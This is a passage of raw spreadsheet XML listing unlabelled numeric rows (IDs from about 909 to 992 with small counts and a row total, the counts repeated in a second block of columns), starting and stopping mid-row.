        <v>31</v>
      </c>
      <c r="K363" s="7">
        <v>909</v>
      </c>
      <c r="L363" s="8">
        <v>26</v>
      </c>
      <c r="M363" s="8">
        <v>1</v>
      </c>
      <c r="N363" s="8">
        <v>0</v>
      </c>
      <c r="O363" s="8">
        <v>0</v>
      </c>
      <c r="P363" s="8">
        <v>3</v>
      </c>
      <c r="Q363" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="364" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A364" s="7">
        <v>911</v>
      </c>
      <c r="B364" s="8">
        <v>30</v>
      </c>
      <c r="C364" s="8">
        <v>1</v>
      </c>
      <c r="D364" s="8">
        <v>57</v>
      </c>
      <c r="E364" s="8">
        <v>421</v>
      </c>
      <c r="F364" s="8">
        <v>63</v>
      </c>
      <c r="G364" s="8">
        <v>454</v>
      </c>
      <c r="H364" s="8">
        <v>1026</v>
      </c>
      <c r="K364" s="7">
        <v>911</v>
      </c>
      <c r="L364" s="8">
        <v>30</v>
      </c>
      <c r="M364" s="8">
        <v>1</v>
      </c>
      <c r="N364" s="8">
        <v>57</v>
      </c>
      <c r="O364" s="8">
        <v>421</v>
      </c>
      <c r="P364" s="8">
        <v>63</v>
      </c>
      <c r="Q364" s="8">
        <v>454</v>
      </c>
    </row>
    <row r="365" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A365" s="7">
        <v>913</v>
      </c>
      <c r="B365" s="8">
        <v>26</v>
      </c>
      <c r="C365" s="8">
        <v>3</v>
      </c>
      <c r="D365" s="8">
        <v>0</v>
      </c>
      <c r="E365" s="8">
        <v>0</v>
      </c>
      <c r="F365" s="8">
        <v>57</v>
      </c>
      <c r="G365" s="8">
        <v>14</v>
      </c>
      <c r="H365" s="8">
        <v>100</v>
      </c>
      <c r="K365" s="7">
        <v>913</v>
      </c>
      <c r="L365" s="8">
        <v>26</v>
      </c>
      <c r="M365" s="8">
        <v>3</v>
      </c>
      <c r="N365" s="8">
        <v>0</v>
      </c>
      <c r="O365" s="8">
        <v>0</v>
      </c>
      <c r="P365" s="8">
        <v>57</v>
      </c>
      <c r="Q365" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="366" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A366" s="7">
        <v>915</v>
      </c>
      <c r="B366" s="8">
        <v>24</v>
      </c>
      <c r="C366" s="8">
        <v>0</v>
      </c>
      <c r="D366" s="8">
        <v>40</v>
      </c>
      <c r="E366" s="8">
        <v>0</v>
      </c>
      <c r="F366" s="8">
        <v>8</v>
      </c>
      <c r="G366" s="8">
        <v>7</v>
      </c>
      <c r="H366" s="8">
        <v>79</v>
      </c>
      <c r="K366" s="7">
        <v>915</v>
      </c>
      <c r="L366" s="8">
        <v>24</v>
      </c>
      <c r="M366" s="8">
        <v>0</v>
      </c>
      <c r="N366" s="8">
        <v>40</v>
      </c>
      <c r="O366" s="8">
        <v>0</v>
      </c>
      <c r="P366" s="8">
        <v>8</v>
      </c>
      <c r="Q366" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="367" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A367" s="7">
        <v>916</v>
      </c>
      <c r="B367" s="8">
        <v>312</v>
      </c>
      <c r="C367" s="8">
        <v>1</v>
      </c>
      <c r="D367" s="8">
        <v>4</v>
      </c>
      <c r="E367" s="8">
        <v>5</v>
      </c>
      <c r="F367" s="8">
        <v>7</v>
      </c>
      <c r="G367" s="8">
        <v>8</v>
      </c>
      <c r="H367" s="8">
        <v>337</v>
      </c>
      <c r="K367" s="7">
        <v>916</v>
      </c>
      <c r="L367" s="8">
        <v>312</v>
      </c>
      <c r="M367" s="8">
        <v>1</v>
      </c>
      <c r="N367" s="8">
        <v>4</v>
      </c>
      <c r="O367" s="8">
        <v>5</v>
      </c>
      <c r="P367" s="8">
        <v>7</v>
      </c>
      <c r="Q367" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="368" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A368" s="7">
        <v>919</v>
      </c>
      <c r="B368" s="8">
        <v>0</v>
      </c>
      <c r="C368" s="8">
        <v>0</v>
      </c>
      <c r="D368" s="8">
        <v>0</v>
      </c>
      <c r="E368" s="8">
        <v>3</v>
      </c>
      <c r="F368" s="8">
        <v>6</v>
      </c>
      <c r="G368" s="8">
        <v>1</v>
      </c>
      <c r="H368" s="8">
        <v>10</v>
      </c>
      <c r="K368" s="7">
        <v>919</v>
      </c>
      <c r="L368" s="8">
        <v>0</v>
      </c>
      <c r="M368" s="8">
        <v>0</v>
      </c>
      <c r="N368" s="8">
        <v>0</v>
      </c>
      <c r="O368" s="8">
        <v>3</v>
      </c>
      <c r="P368" s="8">
        <v>6</v>
      </c>
      <c r="Q368" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="369" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A369" s="7">
        <v>922</v>
      </c>
      <c r="B369" s="8">
        <v>26</v>
      </c>
      <c r="C369" s="8">
        <v>1</v>
      </c>
      <c r="D369" s="8">
        <v>15</v>
      </c>
      <c r="E369" s="8">
        <v>35</v>
      </c>
      <c r="F369" s="8">
        <v>35</v>
      </c>
      <c r="G369" s="8">
        <v>95</v>
      </c>
      <c r="H369" s="8">
        <v>207</v>
      </c>
      <c r="K369" s="7">
        <v>922</v>
      </c>
      <c r="L369" s="8">
        <v>26</v>
      </c>
      <c r="M369" s="8">
        <v>1</v>
      </c>
      <c r="N369" s="8">
        <v>15</v>
      </c>
      <c r="O369" s="8">
        <v>35</v>
      </c>
      <c r="P369" s="8">
        <v>35</v>
      </c>
      <c r="Q369" s="8">
        <v>95</v>
      </c>
    </row>
    <row r="370" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A370" s="7">
        <v>925</v>
      </c>
      <c r="B370" s="8">
        <v>6</v>
      </c>
      <c r="C370" s="8">
        <v>1</v>
      </c>
      <c r="D370" s="8">
        <v>18</v>
      </c>
      <c r="E370" s="8">
        <v>20</v>
      </c>
      <c r="F370" s="8">
        <v>8</v>
      </c>
      <c r="G370" s="8">
        <v>3</v>
      </c>
      <c r="H370" s="8">
        <v>56</v>
      </c>
      <c r="K370" s="7">
        <v>925</v>
      </c>
      <c r="L370" s="8">
        <v>6</v>
      </c>
      <c r="M370" s="8">
        <v>1</v>
      </c>
      <c r="N370" s="8">
        <v>18</v>
      </c>
      <c r="O370" s="8">
        <v>20</v>
      </c>
      <c r="P370" s="8">
        <v>8</v>
      </c>
      <c r="Q370" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="371" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A371" s="7">
        <v>926</v>
      </c>
      <c r="B371" s="8">
        <v>0</v>
      </c>
      <c r="C371" s="8">
        <v>0</v>
      </c>
      <c r="D371" s="8">
        <v>0</v>
      </c>
      <c r="E371" s="8">
        <v>0</v>
      </c>
      <c r="F371" s="8">
        <v>7</v>
      </c>
      <c r="G371" s="8">
        <v>2</v>
      </c>
      <c r="H371" s="8">
        <v>9</v>
      </c>
      <c r="K371" s="7">
        <v>926</v>
      </c>
      <c r="L371" s="8">
        <v>0</v>
      </c>
      <c r="M371" s="8">
        <v>0</v>
      </c>
      <c r="N371" s="8">
        <v>0</v>
      </c>
      <c r="O371" s="8">
        <v>0</v>
      </c>
      <c r="P371" s="8">
        <v>7</v>
      </c>
      <c r="Q371" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="372" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A372" s="7">
        <v>927</v>
      </c>
      <c r="B372" s="8">
        <v>25</v>
      </c>
      <c r="C372" s="8">
        <v>1</v>
      </c>
      <c r="D372" s="8">
        <v>0</v>
      </c>
      <c r="E372" s="8">
        <v>150</v>
      </c>
      <c r="F372" s="8">
        <v>53</v>
      </c>
      <c r="G372" s="8">
        <v>15</v>
      </c>
      <c r="H372" s="8">
        <v>244</v>
      </c>
      <c r="K372" s="7">
        <v>927</v>
      </c>
      <c r="L372" s="8">
        <v>25</v>
      </c>
      <c r="M372" s="8">
        <v>1</v>
      </c>
      <c r="N372" s="8">
        <v>0</v>
      </c>
      <c r="O372" s="8">
        <v>150</v>
      </c>
      <c r="P372" s="8">
        <v>53</v>
      </c>
      <c r="Q372" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="373" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A373" s="7">
        <v>929</v>
      </c>
      <c r="B373" s="8">
        <v>0</v>
      </c>
      <c r="C373" s="8">
        <v>0</v>
      </c>
      <c r="D373" s="8">
        <v>20</v>
      </c>
      <c r="E373" s="8">
        <v>30</v>
      </c>
      <c r="F373" s="8">
        <v>2</v>
      </c>
      <c r="G373" s="8">
        <v>3</v>
      </c>
      <c r="H373" s="8">
        <v>55</v>
      </c>
      <c r="K373" s="7">
        <v>929</v>
      </c>
      <c r="L373" s="8">
        <v>0</v>
      </c>
      <c r="M373" s="8">
        <v>0</v>
      </c>
      <c r="N373" s="8">
        <v>20</v>
      </c>
      <c r="O373" s="8">
        <v>30</v>
      </c>
      <c r="P373" s="8">
        <v>2</v>
      </c>
      <c r="Q373" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="374" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A374" s="7">
        <v>930</v>
      </c>
      <c r="B374" s="8">
        <v>26</v>
      </c>
      <c r="C374" s="8">
        <v>1</v>
      </c>
      <c r="D374" s="8">
        <v>33</v>
      </c>
      <c r="E374" s="8">
        <v>60</v>
      </c>
      <c r="F374" s="8">
        <v>9</v>
      </c>
      <c r="G374" s="8">
        <v>6</v>
      </c>
      <c r="H374" s="8">
        <v>135</v>
      </c>
      <c r="K374" s="7">
        <v>930</v>
      </c>
      <c r="L374" s="8">
        <v>26</v>
      </c>
      <c r="M374" s="8">
        <v>1</v>
      </c>
      <c r="N374" s="8">
        <v>33</v>
      </c>
      <c r="O374" s="8">
        <v>60</v>
      </c>
      <c r="P374" s="8">
        <v>9</v>
      </c>
      <c r="Q374" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="375" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A375" s="7">
        <v>932</v>
      </c>
      <c r="B375" s="8">
        <v>24</v>
      </c>
      <c r="C375" s="8">
        <v>1</v>
      </c>
      <c r="D375" s="8">
        <v>6</v>
      </c>
      <c r="E375" s="8">
        <v>0</v>
      </c>
      <c r="F375" s="8">
        <v>2</v>
      </c>
      <c r="G375" s="8">
        <v>1</v>
      </c>
      <c r="H375" s="8">
        <v>34</v>
      </c>
      <c r="K375" s="7">
        <v>932</v>
      </c>
      <c r="L375" s="8">
        <v>24</v>
      </c>
      <c r="M375" s="8">
        <v>1</v>
      </c>
      <c r="N375" s="8">
        <v>6</v>
      </c>
      <c r="O375" s="8">
        <v>0</v>
      </c>
      <c r="P375" s="8">
        <v>2</v>
      </c>
      <c r="Q375" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="376" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A376" s="7">
        <v>935</v>
      </c>
      <c r="B376" s="8">
        <v>0</v>
      </c>
      <c r="C376" s="8">
        <v>0</v>
      </c>
      <c r="D376" s="8">
        <v>12</v>
      </c>
      <c r="E376" s="8">
        <v>0</v>
      </c>
      <c r="F376" s="8">
        <v>101</v>
      </c>
      <c r="G376" s="8">
        <v>68</v>
      </c>
      <c r="H376" s="8">
        <v>181</v>
      </c>
      <c r="K376" s="7">
        <v>935</v>
      </c>
      <c r="L376" s="8">
        <v>0</v>
      </c>
      <c r="M376" s="8">
        <v>0</v>
      </c>
      <c r="N376" s="8">
        <v>12</v>
      </c>
      <c r="O376" s="8">
        <v>0</v>
      </c>
      <c r="P376" s="8">
        <v>101</v>
      </c>
      <c r="Q376" s="8">
        <v>68</v>
      </c>
    </row>
    <row r="377" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A377" s="7">
        <v>938</v>
      </c>
      <c r="B377" s="8">
        <v>25</v>
      </c>
      <c r="C377" s="8">
        <v>2</v>
      </c>
      <c r="D377" s="8">
        <v>20</v>
      </c>
      <c r="E377" s="8">
        <v>5</v>
      </c>
      <c r="F377" s="8">
        <v>11</v>
      </c>
      <c r="G377" s="8">
        <v>3</v>
      </c>
      <c r="H377" s="8">
        <v>66</v>
      </c>
      <c r="K377" s="7">
        <v>938</v>
      </c>
      <c r="L377" s="8">
        <v>25</v>
      </c>
      <c r="M377" s="8">
        <v>2</v>
      </c>
      <c r="N377" s="8">
        <v>20</v>
      </c>
      <c r="O377" s="8">
        <v>5</v>
      </c>
      <c r="P377" s="8">
        <v>11</v>
      </c>
      <c r="Q377" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="378" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A378" s="7">
        <v>940</v>
      </c>
      <c r="B378" s="8">
        <v>25</v>
      </c>
      <c r="C378" s="8">
        <v>2</v>
      </c>
      <c r="D378" s="8">
        <v>7</v>
      </c>
      <c r="E378" s="8">
        <v>0</v>
      </c>
      <c r="F378" s="8">
        <v>2</v>
      </c>
      <c r="G378" s="8">
        <v>3</v>
      </c>
      <c r="H378" s="8">
        <v>39</v>
      </c>
      <c r="K378" s="7">
        <v>940</v>
      </c>
      <c r="L378" s="8">
        <v>25</v>
      </c>
      <c r="M378" s="8">
        <v>2</v>
      </c>
      <c r="N378" s="8">
        <v>7</v>
      </c>
      <c r="O378" s="8">
        <v>0</v>
      </c>
      <c r="P378" s="8">
        <v>2</v>
      </c>
      <c r="Q378" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="379" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A379" s="7">
        <v>943</v>
      </c>
      <c r="B379" s="8">
        <v>30</v>
      </c>
      <c r="C379" s="8">
        <v>1</v>
      </c>
      <c r="D379" s="8">
        <v>7</v>
      </c>
      <c r="E379" s="8">
        <v>5</v>
      </c>
      <c r="F379" s="8">
        <v>10</v>
      </c>
      <c r="G379" s="8">
        <v>20</v>
      </c>
      <c r="H379" s="8">
        <v>73</v>
      </c>
      <c r="K379" s="7">
        <v>943</v>
      </c>
      <c r="L379" s="8">
        <v>30</v>
      </c>
      <c r="M379" s="8">
        <v>1</v>
      </c>
      <c r="N379" s="8">
        <v>7</v>
      </c>
      <c r="O379" s="8">
        <v>5</v>
      </c>
      <c r="P379" s="8">
        <v>10</v>
      </c>
      <c r="Q379" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="380" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A380" s="7">
        <v>946</v>
      </c>
      <c r="B380" s="8">
        <v>6</v>
      </c>
      <c r="C380" s="8">
        <v>1</v>
      </c>
      <c r="D380" s="8">
        <v>0</v>
      </c>
      <c r="E380" s="8">
        <v>0</v>
      </c>
      <c r="F380" s="8">
        <v>7</v>
      </c>
      <c r="G380" s="8">
        <v>3</v>
      </c>
      <c r="H380" s="8">
        <v>17</v>
      </c>
      <c r="K380" s="7">
        <v>946</v>
      </c>
      <c r="L380" s="8">
        <v>6</v>
      </c>
      <c r="M380" s="8">
        <v>1</v>
      </c>
      <c r="N380" s="8">
        <v>0</v>
      </c>
      <c r="O380" s="8">
        <v>0</v>
      </c>
      <c r="P380" s="8">
        <v>7</v>
      </c>
      <c r="Q380" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="381" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A381" s="7">
        <v>949</v>
      </c>
      <c r="B381" s="8">
        <v>6</v>
      </c>
      <c r="C381" s="8">
        <v>1</v>
      </c>
      <c r="D381" s="8">
        <v>0</v>
      </c>
      <c r="E381" s="8">
        <v>0</v>
      </c>
      <c r="F381" s="8">
        <v>73</v>
      </c>
      <c r="G381" s="8">
        <v>55</v>
      </c>
      <c r="H381" s="8">
        <v>135</v>
      </c>
      <c r="K381" s="7">
        <v>949</v>
      </c>
      <c r="L381" s="8">
        <v>6</v>
      </c>
      <c r="M381" s="8">
        <v>1</v>
      </c>
      <c r="N381" s="8">
        <v>0</v>
      </c>
      <c r="O381" s="8">
        <v>0</v>
      </c>
      <c r="P381" s="8">
        <v>73</v>
      </c>
      <c r="Q381" s="8">
        <v>55</v>
      </c>
    </row>
    <row r="382" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A382" s="7">
        <v>950</v>
      </c>
      <c r="B382" s="8">
        <v>6</v>
      </c>
      <c r="C382" s="8">
        <v>1</v>
      </c>
      <c r="D382" s="8">
        <v>0</v>
      </c>
      <c r="E382" s="8">
        <v>0</v>
      </c>
      <c r="F382" s="8">
        <v>73</v>
      </c>
      <c r="G382" s="8">
        <v>55</v>
      </c>
      <c r="H382" s="8">
        <v>135</v>
      </c>
      <c r="K382" s="7">
        <v>950</v>
      </c>
      <c r="L382" s="8">
        <v>6</v>
      </c>
      <c r="M382" s="8">
        <v>1</v>
      </c>
      <c r="N382" s="8">
        <v>0</v>
      </c>
      <c r="O382" s="8">
        <v>0</v>
      </c>
      <c r="P382" s="8">
        <v>73</v>
      </c>
      <c r="Q382" s="8">
        <v>55</v>
      </c>
    </row>
    <row r="383" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A383" s="7">
        <v>953</v>
      </c>
      <c r="B383" s="8">
        <v>26</v>
      </c>
      <c r="C383" s="8">
        <v>1</v>
      </c>
      <c r="D383" s="8">
        <v>7</v>
      </c>
      <c r="E383" s="8">
        <v>12</v>
      </c>
      <c r="F383" s="8">
        <v>17</v>
      </c>
      <c r="G383" s="8">
        <v>11</v>
      </c>
      <c r="H383" s="8">
        <v>74</v>
      </c>
      <c r="K383" s="7">
        <v>953</v>
      </c>
      <c r="L383" s="8">
        <v>26</v>
      </c>
      <c r="M383" s="8">
        <v>1</v>
      </c>
      <c r="N383" s="8">
        <v>7</v>
      </c>
      <c r="O383" s="8">
        <v>12</v>
      </c>
      <c r="P383" s="8">
        <v>17</v>
      </c>
      <c r="Q383" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="384" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A384" s="7">
        <v>954</v>
      </c>
      <c r="B384" s="8">
        <v>25</v>
      </c>
      <c r="C384" s="8">
        <v>1</v>
      </c>
      <c r="D384" s="8">
        <v>25</v>
      </c>
      <c r="E384" s="8">
        <v>4</v>
      </c>
      <c r="F384" s="8">
        <v>9</v>
      </c>
      <c r="G384" s="8">
        <v>2</v>
      </c>
      <c r="H384" s="8">
        <v>66</v>
      </c>
      <c r="K384" s="7">
        <v>954</v>
      </c>
      <c r="L384" s="8">
        <v>25</v>
      </c>
      <c r="M384" s="8">
        <v>1</v>
      </c>
      <c r="N384" s="8">
        <v>25</v>
      </c>
      <c r="O384" s="8">
        <v>4</v>
      </c>
      <c r="P384" s="8">
        <v>9</v>
      </c>
      <c r="Q384" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="385" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A385" s="7">
        <v>958</v>
      </c>
      <c r="B385" s="8">
        <v>45</v>
      </c>
      <c r="C385" s="8">
        <v>1</v>
      </c>
      <c r="D385" s="8">
        <v>0</v>
      </c>
      <c r="E385" s="8">
        <v>0</v>
      </c>
      <c r="F385" s="8">
        <v>58</v>
      </c>
      <c r="G385" s="8">
        <v>80</v>
      </c>
      <c r="H385" s="8">
        <v>184</v>
      </c>
      <c r="K385" s="7">
        <v>958</v>
      </c>
      <c r="L385" s="8">
        <v>45</v>
      </c>
      <c r="M385" s="8">
        <v>1</v>
      </c>
      <c r="N385" s="8">
        <v>0</v>
      </c>
      <c r="O385" s="8">
        <v>0</v>
      </c>
      <c r="P385" s="8">
        <v>58</v>
      </c>
      <c r="Q385" s="8">
        <v>80</v>
      </c>
    </row>
    <row r="386" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A386" s="7">
        <v>959</v>
      </c>
      <c r="B386" s="8">
        <v>25</v>
      </c>
      <c r="C386" s="8">
        <v>0</v>
      </c>
      <c r="D386" s="8">
        <v>10</v>
      </c>
      <c r="E386" s="8">
        <v>10</v>
      </c>
      <c r="F386" s="8">
        <v>23</v>
      </c>
      <c r="G386" s="8">
        <v>33</v>
      </c>
      <c r="H386" s="8">
        <v>101</v>
      </c>
      <c r="K386" s="7">
        <v>959</v>
      </c>
      <c r="L386" s="8">
        <v>25</v>
      </c>
      <c r="M386" s="8">
        <v>0</v>
      </c>
      <c r="N386" s="8">
        <v>10</v>
      </c>
      <c r="O386" s="8">
        <v>10</v>
      </c>
      <c r="P386" s="8">
        <v>23</v>
      </c>
      <c r="Q386" s="8">
        <v>33</v>
      </c>
    </row>
    <row r="387" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A387" s="7">
        <v>963</v>
      </c>
      <c r="B387" s="8">
        <v>24</v>
      </c>
      <c r="C387" s="8">
        <v>0</v>
      </c>
      <c r="D387" s="8">
        <v>0</v>
      </c>
      <c r="E387" s="8">
        <v>0</v>
      </c>
      <c r="F387" s="8">
        <v>5</v>
      </c>
      <c r="G387" s="8">
        <v>2</v>
      </c>
      <c r="H387" s="8">
        <v>31</v>
      </c>
      <c r="K387" s="7">
        <v>963</v>
      </c>
      <c r="L387" s="8">
        <v>24</v>
      </c>
      <c r="M387" s="8">
        <v>0</v>
      </c>
      <c r="N387" s="8">
        <v>0</v>
      </c>
      <c r="O387" s="8">
        <v>0</v>
      </c>
      <c r="P387" s="8">
        <v>5</v>
      </c>
      <c r="Q387" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="388" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A388" s="7">
        <v>965</v>
      </c>
      <c r="B388" s="8">
        <v>26</v>
      </c>
      <c r="C388" s="8">
        <v>3</v>
      </c>
      <c r="D388" s="8">
        <v>9</v>
      </c>
      <c r="E388" s="8">
        <v>5</v>
      </c>
      <c r="F388" s="8">
        <v>21</v>
      </c>
      <c r="G388" s="8">
        <v>7</v>
      </c>
      <c r="H388" s="8">
        <v>71</v>
      </c>
      <c r="K388" s="7">
        <v>965</v>
      </c>
      <c r="L388" s="8">
        <v>26</v>
      </c>
      <c r="M388" s="8">
        <v>3</v>
      </c>
      <c r="N388" s="8">
        <v>9</v>
      </c>
      <c r="O388" s="8">
        <v>5</v>
      </c>
      <c r="P388" s="8">
        <v>21</v>
      </c>
      <c r="Q388" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="389" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A389" s="7">
        <v>966</v>
      </c>
      <c r="B389" s="8">
        <v>7</v>
      </c>
      <c r="C389" s="8">
        <v>2</v>
      </c>
      <c r="D389" s="8">
        <v>0</v>
      </c>
      <c r="E389" s="8">
        <v>0</v>
      </c>
      <c r="F389" s="8">
        <v>55</v>
      </c>
      <c r="G389" s="8">
        <v>12</v>
      </c>
      <c r="H389" s="8">
        <v>76</v>
      </c>
      <c r="K389" s="7">
        <v>966</v>
      </c>
      <c r="L389" s="8">
        <v>7</v>
      </c>
      <c r="M389" s="8">
        <v>2</v>
      </c>
      <c r="N389" s="8">
        <v>0</v>
      </c>
      <c r="O389" s="8">
        <v>0</v>
      </c>
      <c r="P389" s="8">
        <v>55</v>
      </c>
      <c r="Q389" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="390" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A390" s="7">
        <v>974</v>
      </c>
      <c r="B390" s="8">
        <v>25</v>
      </c>
      <c r="C390" s="8">
        <v>1</v>
      </c>
      <c r="D390" s="8">
        <v>0</v>
      </c>
      <c r="E390" s="8">
        <v>0</v>
      </c>
      <c r="F390" s="8">
        <v>32</v>
      </c>
      <c r="G390" s="8">
        <v>6</v>
      </c>
      <c r="H390" s="8">
        <v>64</v>
      </c>
      <c r="K390" s="7">
        <v>974</v>
      </c>
      <c r="L390" s="8">
        <v>25</v>
      </c>
      <c r="M390" s="8">
        <v>1</v>
      </c>
      <c r="N390" s="8">
        <v>0</v>
      </c>
      <c r="O390" s="8">
        <v>0</v>
      </c>
      <c r="P390" s="8">
        <v>32</v>
      </c>
      <c r="Q390" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="391" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A391" s="7">
        <v>976</v>
      </c>
      <c r="B391" s="8">
        <v>26</v>
      </c>
      <c r="C391" s="8">
        <v>1</v>
      </c>
      <c r="D391" s="8">
        <v>30</v>
      </c>
      <c r="E391" s="8">
        <v>20</v>
      </c>
      <c r="F391" s="8">
        <v>8</v>
      </c>
      <c r="G391" s="8">
        <v>3</v>
      </c>
      <c r="H391" s="8">
        <v>88</v>
      </c>
      <c r="K391" s="7">
        <v>976</v>
      </c>
      <c r="L391" s="8">
        <v>26</v>
      </c>
      <c r="M391" s="8">
        <v>1</v>
      </c>
      <c r="N391" s="8">
        <v>30</v>
      </c>
      <c r="O391" s="8">
        <v>20</v>
      </c>
      <c r="P391" s="8">
        <v>8</v>
      </c>
      <c r="Q391" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="392" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A392" s="7">
        <v>979</v>
      </c>
      <c r="B392" s="8">
        <v>26</v>
      </c>
      <c r="C392" s="8">
        <v>0</v>
      </c>
      <c r="D392" s="8">
        <v>0</v>
      </c>
      <c r="E392" s="8">
        <v>0</v>
      </c>
      <c r="F392" s="8">
        <v>22</v>
      </c>
      <c r="G392" s="8">
        <v>8</v>
      </c>
      <c r="H392" s="8">
        <v>56</v>
      </c>
      <c r="K392" s="7">
        <v>979</v>
      </c>
      <c r="L392" s="8">
        <v>26</v>
      </c>
      <c r="M392" s="8">
        <v>0</v>
      </c>
      <c r="N392" s="8">
        <v>0</v>
      </c>
      <c r="O392" s="8">
        <v>0</v>
      </c>
      <c r="P392" s="8">
        <v>22</v>
      </c>
      <c r="Q392" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="393" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A393" s="7">
        <v>983</v>
      </c>
      <c r="B393" s="8">
        <v>25</v>
      </c>
      <c r="C393" s="8">
        <v>1</v>
      </c>
      <c r="D393" s="8">
        <v>4</v>
      </c>
      <c r="E393" s="8">
        <v>2</v>
      </c>
      <c r="F393" s="8">
        <v>3</v>
      </c>
      <c r="G393" s="8">
        <v>3</v>
      </c>
      <c r="H393" s="8">
        <v>38</v>
      </c>
      <c r="K393" s="7">
        <v>983</v>
      </c>
      <c r="L393" s="8">
        <v>25</v>
      </c>
      <c r="M393" s="8">
        <v>1</v>
      </c>
      <c r="N393" s="8">
        <v>4</v>
      </c>
      <c r="O393" s="8">
        <v>2</v>
      </c>
      <c r="P393" s="8">
        <v>3</v>
      </c>
      <c r="Q393" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="394" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A394" s="7">
        <v>984</v>
      </c>
      <c r="B394" s="8">
        <v>24</v>
      </c>
      <c r="C394" s="8">
        <v>0</v>
      </c>
      <c r="D394" s="8">
        <v>0</v>
      </c>
      <c r="E394" s="8">
        <v>0</v>
      </c>
      <c r="F394" s="8">
        <v>11</v>
      </c>
      <c r="G394" s="8">
        <v>3</v>
      </c>
      <c r="H394" s="8">
        <v>38</v>
      </c>
      <c r="K394" s="7">
        <v>984</v>
      </c>
      <c r="L394" s="8">
        <v>24</v>
      </c>
      <c r="M394" s="8">
        <v>0</v>
      </c>
      <c r="N394" s="8">
        <v>0</v>
      </c>
      <c r="O394" s="8">
        <v>0</v>
      </c>
      <c r="P394" s="8">
        <v>11</v>
      </c>
      <c r="Q394" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="395" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A395" s="7">
        <v>985</v>
      </c>
      <c r="B395" s="8">
        <v>25</v>
      </c>
      <c r="C395" s="8">
        <v>1</v>
      </c>
      <c r="D395" s="8">
        <v>0</v>
      </c>
      <c r="E395" s="8">
        <v>0</v>
      </c>
      <c r="F395" s="8">
        <v>9</v>
      </c>
      <c r="G395" s="8">
        <v>5</v>
      </c>
      <c r="H395" s="8">
        <v>40</v>
      </c>
      <c r="K395" s="7">
        <v>985</v>
      </c>
      <c r="L395" s="8">
        <v>25</v>
      </c>
      <c r="M395" s="8">
        <v>1</v>
      </c>
      <c r="N395" s="8">
        <v>0</v>
      </c>
      <c r="O395" s="8">
        <v>0</v>
      </c>
      <c r="P395" s="8">
        <v>9</v>
      </c>
      <c r="Q395" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="396" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A396" s="7">
        <v>990</v>
      </c>
      <c r="B396" s="8">
        <v>25</v>
      </c>
      <c r="C396" s="8">
        <v>1</v>
      </c>
      <c r="D396" s="8">
        <v>14</v>
      </c>
      <c r="E396" s="8">
        <v>8</v>
      </c>
      <c r="F396" s="8">
        <v>45</v>
      </c>
      <c r="G396" s="8">
        <v>53</v>
      </c>
      <c r="H396" s="8">
        <v>146</v>
      </c>
      <c r="K396" s="7">
        <v>990</v>
      </c>
      <c r="L396" s="8">
        <v>25</v>
      </c>
      <c r="M396" s="8">
        <v>1</v>
      </c>
      <c r="N396" s="8">
        <v>14</v>
      </c>
      <c r="O396" s="8">
        <v>8</v>
      </c>
      <c r="P396" s="8">
        <v>45</v>
      </c>
      <c r="Q396" s="8">
        <v>53</v>
      </c>
    </row>
    <row r="397" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A397" s="7">
        <v>992</v>
      </c>
      <c r="B397" s="8">
        <v>30</v>
      </c>
      <c r="C397" s="8">
        <v>0</v>
      </c>
      <c r="D397" s="8">
        <v>23</v>
      </c>
      <c r="E397" s="8">
        <v>12</v>
      </c>
      <c r="F397" s="8">
        <v>8</v>
      </c>
      <c r="G397" s="8">
        <v>4</v>
      </c>
      <c r="H397" s="8">
